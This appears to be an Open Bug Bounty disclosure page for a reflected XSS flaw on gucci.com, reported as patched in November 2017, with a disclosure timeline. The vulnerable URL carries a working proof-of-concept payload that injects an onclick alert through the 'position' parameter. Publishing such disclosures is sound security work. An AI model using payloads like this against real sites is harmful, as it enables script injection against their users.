logo
DATABASE RESOURCES PRICING ABOUT US

gucci.com XSS vulnerability

Description

##### Vulnerable URL: https://www.gucci.com/it/it/pr/men/mens-accessories/mens-eyewear/mens-sunglasses/round-frame-acetate-sunglasses-p-470480J07701011?position=%22%20accesskey=%22X%22%20onclick=%22alert(%27OPENBUGBOUNTY%27)&listName;=ProductGridComponent&categoryPath;=Gifts/Gifts-for-Him ##### Details: Description| Value ---|--- Patched:| Yes, at 25.11.2017 Latest check for patch:| 25.11.2017 20:05 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 5237 VIP website status:| Yes Check gucci.com SSL connection:| (Grade: A) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 27 August, 2017 11:59 GMT Generic security notifications sent to website owner| 27 August, 2017 12:01 GMT Notification sent to subscribers (without technical details)| 27 August, 2017 14:17 GMT Vulnerability details disclosed by researcher| 25 November, 2017 12:30 GMT Vulnerability patched by the website owner| 25 November, 2017 20:05 GMT